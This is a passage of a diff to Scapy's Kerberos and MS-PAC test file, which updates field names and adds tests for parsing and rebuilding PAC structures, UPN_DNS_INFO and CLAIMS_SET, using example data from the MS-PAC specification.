pkt.innerContextToken.token.mechToken.value.root.innerContextToken.TOK_ID == b'\x01\x00' -krb = pkt.innerContextToken.token.mechToken.value.root.innerContextToken.payload -assert isinstance(krb, Kerberos) -assert krb.root.ticket.sname.nameString == [b"cifs", b"localdc"] +assert isinstance(pkt.innerToken.token.mechToken.value.root, GSSAPI_BLOB) +assert pkt.innerToken.token.mechToken.value.root.innerToken.TOK_ID == b'\x01\x00' +krb = pkt.innerToken.token.mechToken.value.root.innerToken.root +assert isinstance(krb, KRB_AP_REQ) +assert krb.ticket.sname.nameString == [b"cifs", b"localdc"] + += MSPAC - Parse WIN2K-PAC (real life) -= Parse WIN2K-PAC (real life) +from scapy.layers.msrpce.mspac import * # PAC in the example from https://scapy.readthedocs.io/en/latest/layers/kerberos.html#decrypt-fast @@ -110,16 +224,16 @@ assert [type(x) for x in pkt.Payloads] == [ assert pkt.Payloads[2].Upn == 'SRV$@dom1.local' assert pkt.Payloads[2].DnsDomainName == 'DOM1.LOCAL' assert pkt.Payloads[2].SamName == 'SRV$' -assert pkt.Payloads[2].Sid == b'\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xfa*@1\xb2f\xa6\x1c\x11dp\\P\x04\x00\x00' +assert pkt.Payloads[2].Sid.summary() == 'S-1-5-21-826288890-480667314-1550869521-1104' -assert pkt.Payloads[3].value.Claims.ClaimsSet.value.value[0].value.data.ClaimsArrays.value.value[0].usClaimsSourceType == 1 -claimentry = pkt.Payloads[3].value.Claims.ClaimsSet.value.value[0].value.data.ClaimsArrays.value.value[0].ClaimEntries.value.value[0] +assert pkt.Payloads[3].value.Claims.ClaimsSet.value.value[0].value.ClaimsArrays.value.value[0].usClaimsSourceType == 1 +claimentry = pkt.Payloads[3].value.Claims.ClaimsSet.value.value[0].value.ClaimsArrays.value.value[0].ClaimEntries.value.value[0] assert claimentry.Id.value.value[0].value == b'ad://ext/AuthenticationSilo' assert claimentry.Values.value.StringValues.value.value[0].value.value[0].value == b'T0-silo' assert pkt.Payloads[4].Flags[0].PAC_WAS_REQUESTED -assert pkt.Payloads[5].Sid == b'\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xfa*@1\xb2f\xa6\x1c\x11dp\\P\x04\x00\x00' +assert pkt.Payloads[5].Sid.summary() == 'S-1-5-21-826288890-480667314-1550869521-1104' assert pkt.Payloads[6].SignatureType == 16 assert pkt.Payloads[6].Signature == b'd\xb0qv\xf8\xd3X\x0b\x7f4\xfe\xda' @@ -127,7 +241,7 @@ assert pkt.Payloads[6].Signature == b'd\xb0qv\xf8\xd3X\x0b\x7f4\xfe\xda' assert pkt.Payloads[7].SignatureType == 16 assert pkt.Payloads[7].Signature == b'\x835J\xa7\x80\xb1S\xcez\x8b\xd2\xc2' -= Parse WIN2K-PAC (MS-PAC sect 3) += MSPAC - Parse WIN2K-PAC (MS-PAC sect 3) # Example data from [MS-PAC] sect 3 - Structural example @@ -136,7 +250,7 @@ data = b'0\x82\x05R0\x82\x05N\xa0\x04\x02\x02\x00\x80\xa1\x82\x05D\x04\x82\x05@\ pkt = AuthorizationData(data) assert isinstance(pkt.seq[0].adData.Payloads[0], NDRSerialization1Header) -k = pkt.seq[0].adData.Payloads[0].value.data +k = pkt.seq[0].adData.Payloads[0].value assert isinstance(k, KERB_VALIDATION_INFO) assert k.EffectiveName.Buffer.value.value[0].value == b'lzhu' assert k.LogonDomainName.Buffer.value.value[0].value == b"NTDEV" @@ -154,7 +268,7 @@ assert len(pkt.seq[0].adData.Payloads[2].Signature) == 16 assert isinstance(pkt.seq[0].adData.Payloads[3], PAC_SIGNATURE_DATA) assert pkt.seq[0].adData.Payloads[3].Signature == b'\xf7\xa54\xda\xb2\xc0)\x86\xef\xe0\xfb\xe5\x11\nO2' -= Build WIN2K-PAC (MS-PAC sect 3) += MSPAC - Build WIN2K-PAC (MS-PAC sect 3) pkt = PACTYPE( Buffers=[ @@ -165,509 +279,508 @@ pkt = PACTYPE( ], Payloads=[ NDRSerialization1Header( - Version=1, Endianness=16, CommonHeaderLength=8, Filler=3435973836 + Version=1, + Endianness=16, + CommonHeaderLength=8, + Filler=3435973836, ) / NDRSerialization1PrivateHeader(ObjectBufferLength=1184, Filler=0) / NDRPointer( - ndr64=False, referent_id=131072, - value=KERB_VALIDATION_INFO_WRAP( - ndr64=False, - data=KERB_VALIDATION_INFO( - LogonTime=FILETIME( - dwLowDateTime=258377425, dwHighDateTime=29780581 - ), - LogoffTime=FILETIME( - dwLowDateTime=4294967295, dwHighDateTime=2147483647 - ), - KickOffTime=FILETIME( - dwLowDateTime=4294967295, dwHighDateTime=2147483647 - ), - PasswordLastSet=FILETIME( - dwLowDateTime=4265202711, dwHighDateTime=29772408 - ), - PasswordCanChange=FILETIME( - dwLowDateTime=681808919, dwHighDateTime=29772610 - ), - PasswordMustChange=FILETIME( - dwLowDateTime=2535740439, dwHighDateTime=29786490 - ), - EffectiveName=RPC_UNICODE_STRING( - Length=8, - MaximumLength=8, - Buffer=NDRPointer( - referent_id=131076, - value=NDRConformantArray( - max_count=4, - value=[ - NDRVaryingArray( - offset=0, actual_count=4, value=b"lzhu" - ) - ], - ), - ), - ), - FullName=RPC_UNICODE_STRING( - Length=36, - MaximumLength=36, - Buffer=NDRPointer( - referent_id=131080, - value=NDRConformantArray( - max_count=18, - value=[ - NDRVaryingArray( - offset=0, - actual_count=18, - value=b"Liqiang(Larry) Zhu", - ) - ], - ), + value=KERB_VALIDATION_INFO( + LogonTime=FILETIME(dwLowDateTime=258377425, dwHighDateTime=29780581), + LogoffTime=FILETIME( + dwLowDateTime=4294967295, dwHighDateTime=2147483647 + ), + KickOffTime=FILETIME( + dwLowDateTime=4294967295, dwHighDateTime=2147483647 + ), + PasswordLastSet=FILETIME( + dwLowDateTime=4265202711, dwHighDateTime=29772408 + ), + PasswordCanChange=FILETIME( + dwLowDateTime=681808919, dwHighDateTime=29772610 + ), + PasswordMustChange=FILETIME( + dwLowDateTime=2535740439, dwHighDateTime=29786490 + ), + EffectiveName=RPC_UNICODE_STRING( + Length=8, + MaximumLength=8, + Buffer=NDRPointer( + referent_id=131076, + value=NDRConformantArray( + max_count=4, + value=[ + NDRVaryingArray(offset=0, actual_count=4, value=b"lzhu") + ], ), ), - LogonScript=RPC_UNICODE_STRING( - Length=18, - MaximumLength=18, - Buffer=NDRPointer( - referent_id=131084, - value=NDRConformantArray( - max_count=9, - value=[ - NDRVaryingArray( - offset=0, actual_count=9, value=b"ntds2.bat" - ) - ], - ), + ), + FullName=RPC_UNICODE_STRING( + Length=36, + MaximumLength=36, + Buffer=NDRPointer( + referent_id=131080, + value=NDRConformantArray( + max_count=18, + value=[ + NDRVaryingArray( + offset=0, + actual_count=18, + value=b"Liqiang(Larry) Zhu", + ) + ], ), ), - ProfilePath=RPC_UNICODE_STRING( - Length=0, - MaximumLength=0, - Buffer=NDRPointer( - referent_id=131088, - value=NDRConformantArray( - max_count=0, - value=[ - NDRVaryingArray(offset=0, actual_count=0, value=b"") - ], - ), + ), + LogonScript=RPC_UNICODE_STRING( + Length=18, + MaximumLength=18, + Buffer=NDRPointer( + referent_id=131084, + value=NDRConformantArray( + max_count=9, + value=[ + NDRVaryingArray( + offset=0, + actual_count=9, + value=b"ntds2.bat", + ) + ], ), ), - HomeDirectory=RPC_UNICODE_STRING( - Length=0, - MaximumLength=0, - Buffer=NDRPointer( - referent_id=131092, - value=NDRConformantArray( - max_count=0, - value=[ - NDRVaryingArray(offset=0, actual_count=0, value=b"") - ], - ), + ), + ProfilePath=RPC_UNICODE_STRING( + Length=0, + MaximumLength=0, + Buffer=NDRPointer( + referent_id=131088, + value=NDRConformantArray( + max_count=0, + value=[ + NDRVaryingArray(offset=0, actual_count=0, value=b"") + ], ), ), - HomeDirectoryDrive=RPC_UNICODE_STRING( - Length=0, - MaximumLength=0, - Buffer=NDRPointer( - referent_id=131096, - value=NDRConformantArray( - max_count=0, - value=[ - NDRVaryingArray(offset=0, actual_count=0, value=b"") - ], - ), + ), + HomeDirectory=RPC_UNICODE_STRING( + Length=0, + MaximumLength=0, + Buffer=NDRPointer( + referent_id=131092, + value=NDRConformantArray( + max_count=0, + value=[ + NDRVaryingArray(offset=0, actual_count=0, value=b"") + ], ), ), - UserSessionKey=USER_SESSION_KEY( - data=[ - CYPHER_BLOCK(data=b"\x00\x00\x00\x00\x00\x00\x00\x00"), - CYPHER_BLOCK(data=b"\x00\x00\x00\x00\x00\x00\x00\x00"), - ] - ), - LogonServer=RPC_UNICODE_STRING( - Length=22, - MaximumLength=24, - Buffer=NDRPointer( - referent_id=131104, - value=NDRConformantArray( - max_count=12, - value=[ - NDRVaryingArray( - offset=0, actual_count=11, value=b"NTDEV-DC-05" - ) - ], - ), + ), + HomeDirectoryDrive=RPC_UNICODE_STRING( + Length=0, + MaximumLength=0, + Buffer=NDRPointer( + referent_id=131096, + value=NDRConformantArray( + max_count=0, + value=[ + NDRVaryingArray(offset=0, actual_count=0, value=b"") + ], ), ), - LogonDomainName=RPC_UNICODE_STRING( - Length=10, - MaximumLength=12, - Buffer=NDRPointer( - referent_id=131108, - value=NDRConformantArray( - max_count=6, - value=[ - NDRVaryingArray( - offset=0, actual_count=5, value=b"NTDEV" - ) - ], - ), + ), + UserSessionKey=USER_SESSION_KEY( + data=[ + CYPHER_BLOCK(data=b"\x00\x00\x00\x00\x00\x00\x00\x00"), + CYPHER_BLOCK(data=b"\x00\x00\x00\x00\x00\x00\x00\x00"), + ] + ), + LogonServer=RPC_UNICODE_STRING( + Length=22, + MaximumLength=24, + Buffer=NDRPointer( + referent_id=131104, + value=NDRConformantArray( + max_count=12, + value=[ + NDRVaryingArray( + offset=0, + actual_count=11, + value=b"NTDEV-DC-05", + ) + ], ), ), - Reserved1=[0, 0], - Reserved3=[0, 0, 0, 0, 0, 0, 0], - LogonCount=4180, - BadPasswordCount=0, - UserId=2914711, - PrimaryGroupId=513, - GroupCount=26, - GroupIds=NDRPointer( - referent_id=131100, + ), + LogonDomainName=RPC_UNICODE_STRING( + Length=10, + MaximumLength=12, + Buffer=NDRPointer( + referent_id=131108, value=NDRConformantArray( - max_count=26, + max_count=6, value=[ - PGROUP_MEMBERSHIP(RelativeId=3392609, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=2999049, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3322974, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=513, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=2931095, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3338539, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3354830, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3026599, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3338538, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=2931096, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3392610, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3342740, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3392630, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3014318, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=2937394, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3278870, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3038018, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3322975, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3513546, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=2966661, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3338434, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3271401, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3051245, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3271606, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3026603, Attributes=7), - PGROUP_MEMBERSHIP(RelativeId=3018354, Attributes=7), + NDRVaryingArray( + offset=0, actual_count=5, value=b"NTDEV" + ) ], ), ), - UserFlags=32, - LogonDomainId=NDRPointer( - referent_id=131112, - value=PSID( - max_count=4, - Revision=1, - SubAuthorityCount=4, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[21, 397955417, 626881126, 188441444], + ), + Reserved1=[0, 0], + Reserved3=[0, 0, 0, 0, 0, 0, 0], + LogonCount=4180, + BadPasswordCount=0, + UserId=2914711, + PrimaryGroupId=513, + GroupCount=26, + GroupIds=NDRPointer( + referent_id=131100, + value=NDRConformantArray( + max_count=26, + value=[ + GROUP_MEMBERSHIP(RelativeId=3392609, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=2999049, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3322974, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=513, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=2931095, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3338539, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3354830, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3026599, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3338538, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=2931096, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3392610, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3342740, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3392630, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3014318, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=2937394, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3278870, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3038018, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3322975, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3513546, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=2966661, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3338434, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3271401, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3051245, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3271606, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3026603, Attributes=7), + GROUP_MEMBERSHIP(RelativeId=3018354, Attributes=7), + ], + ), + ), + UserFlags=32, + LogonDomainId=NDRPointer( + referent_id=131112, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[21, 397955417, 626881126, 188441444], + max_count=4, + Revision=1, + SubAuthorityCount=4, ), - UserAccountControl=16, - SidCount=13, - ExtraSids=NDRPointer( - referent_id=131116, - value=NDRConformantArray( - max_count=13, - value=[ - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131120, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 773533881, - 1816936887, - 355810188, - 513, - ], + ), + UserAccountControl=16, + SidCount=13, + ExtraSids=NDRPointer( + referent_id=131116, + value=NDRConformantArray( + max_count=13, + value=[ + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131120, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 773533881, + 1816936887, + 355810188, + 513, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=7, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131124, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3101812, - ], + Attributes=7, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131124, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3101812, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131128, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3291368, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131128, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3291368, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131132, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3291341, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131132, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3291341, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131136, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3322973, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131136, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3322973, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131140, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3479105, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131140, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3479105, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131144, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3271400, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131144, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3271400, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131148, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3283393, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131148, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3283393, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131152, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3338537, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131152, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3338537, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131156, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3038991, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131156, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3038991, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131160, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3037999, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131160, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3037999, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131164, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3248111, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131164, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3248111, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - PKERB_SID_AND_ATTRIBUTES( - Sid=NDRPointer( - referent_id=131168, - value=PSID( - max_count=5, - Revision=1, - SubAuthorityCount=5, - IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( - Value=b"\x00\x00\x00\x00\x00\x05" - ), - SubAuthority=[ - 21, - 397955417, - 626881126, - 188441444, - 3038983, - ], + Attributes=536870919, + ), + KERB_SID_AND_ATTRIBUTES( + Sid=NDRPointer( + referent_id=131168, + value=SID( + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=b"\x00\x00\x00\x00\x00\x05" ), + SubAuthority=[ + 21, + 397955417, + 626881126, + 188441444, + 3038983, + ], + max_count=5, + Revision=1, + SubAuthorityCount=5, ), - Attributes=536870919, ), - ], - ), + Attributes=536870919, + ), + ], ), - ResourceGroupDomainSid=None, - ResourceGroupCount=0, - ResourceGroupIds=None, - ) - ) - / Padding(load=b"\x00\x00\x00\x00"), - ), - PAC_CLIENT_INFO( - ClientId=127906621700000000, NameLength=8, Name=b"lzhu" - ), + ), + ResourceGroupDomainSid=None, + ResourceGroupCount=0, + ResourceGroupIds=None, + ), + ) + / Padding(), + PAC_CLIENT_INFO(ClientId=127906621700000000, NameLength=8, Name="lzhu"), PAC_SIGNATURE_DATA( SignatureType=4294967158, Signature=b"A\xed\xce\x9a4\x81]:\xef{\xc9\x88t\x80]%", + RODCIdentifier=b"", ), PAC_SIGNATURE_DATA( SignatureType=4294967158, Signature=b"\xf7\xa54\xda\xb2\xc0)\x86\xef\xe0\xfb\xe5\x11\nO2", + RODCIdentifier=b"", ), ], cBuffers=4, @@ -676,12 +789,175 @@ pkt = PACTYPE( assert raw(pkt) == data[22:] -+ Crypto tests -~ disabled += MSPAC - Dissect and rebuild UPN_DNS_INFO + +from scapy.layers.msrpce.mspac import UPN_DNS_INFO + +data = b'4\x00\x18\x00\x18\x00P\x00\x03\x00\x00\x00\x1a\x00h\x00\x1c\x00\x88\x00\x00\x00\x00\x00A\x00d\x00m\x00i\x00n\x00i\x00s\x00t\x00r\x00a\x00t\x00o\x00r\x00@\x00d\x00o\x00m\x00a\x00i\x00n\x00.\x00l\x00o\x00c\x00a\x00l\x00\x00\x00\x00\x00D\x00O\x00M\x00A\x00I\x00N\x00.\x00L\x00O\x00C\x00A\x00L\x00A\x00d\x00m\x00i\x00n\x00i\x00s\x00t\x00r\x00a\x00t\x00o\x00r\x00\x00\x00\x00\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xfe\x00\xb0r\x02\n\xa6\xdd\xa9\xa4e\x02\xf4\x01\x00\x00\x00\x00\x00\x00' + +# This is extended +pkt = UPN_DNS_INFO(data) -# disabled because pycryptodome but they work ! +assert pkt.Upn == 'Administrator@domain.local' +assert pkt.DnsDomainName == 'DOMAIN.LOCAL' +assert pkt.SamName == 'Administrator' +assert pkt.Sid.summary() == 'S-1-5-21-1924137214-3718646274-40215721-500' +assert isinstance(pkt.payload, Raw) and pkt.load == b"\x00\x00\x00\x00" -= Test vectors for KRB-FX-CF2 +# Re-build +pkt.clear_cache() +assert bytes(pkt) == data + + ++ Build a CLAIMS_SET to test size_of + += MSPAC - Construct a CLAIMS_SET object + +% the goal of this test is to see if: +% - all intermediate types are properly inferred +% - sizes are properly computed + +from scapy.layers.msrpce.mspac import * + +claimSet = CLAIMS_SET( + ClaimsArrays=[ + CLAIMS_ARRAY( + usClaimsSourceType=1, + ClaimEntries=[ + CLAIM_ENTRY( + Id="ad://ext/AuthenticationSilo", + Type=3, + Values=NDRUnion( + tag=3, + value=CLAIM_ENTRY_sub2( + StringValues=["T0-silo"], + ), + ), + ) + ], + ) + ], + usReservedType=0, + ulReservedFieldSize=0, + ReservedField=None, +) + += MSPAC - Check that Pointers, Arrays, etc. were inferred + +assert isinstance(claimSet.ClaimsArrays, NDRPointer) +assert isinstance(claimSet.ClaimsArrays.value, NDRConformantArray) +assert isinstance(claimSet.ClaimsArrays.value.value[0].ClaimEntries, NDRPointer) +assert isinstance(claimSet.ClaimsArrays.value.value[0].ClaimEntries.value, NDRConformantArray) +assert isinstance(claimSet.valueof("ClaimsArrays")[0].valueof("ClaimEntries")[0].Values, NDRUnion) +assert isinstance(claimSet.valueof("ClaimsArrays")[0].valueof("ClaimEntries")[0].Values.value.StringValues, NDRPointer) +assert isinstance(claimSet.valueof("ClaimsArrays")[0].valueof("ClaimEntries")[0].Values.value.StringValues.value, NDRConformantArray) +assert isinstance(claimSet.valueof("ClaimsArrays")[0].valueof("ClaimEntries")[0].Values.value.StringValues.value.value[0], NDRPointer) +assert isinstance(claimSet.valueof("ClaimsArrays")[0].valueof("ClaimEntries")[0].Values.value.StringValues.value.value[0].value, NDRConformantArray) +assert isinstance(claimSet.valueof("ClaimsArrays")[0].valueof("ClaimEntries")[0].Values.value.StringValues.value.value[0].value.value[0], NDRVaryingArray) +assert claimSet.valueof("ClaimsArrays")[0].valueof("ClaimEntries")[0].valueof("Values").valueof("StringValues")[0] == b'T0-silo' + += MSPAC - Build the packet + +assert bytes(claimSet) == 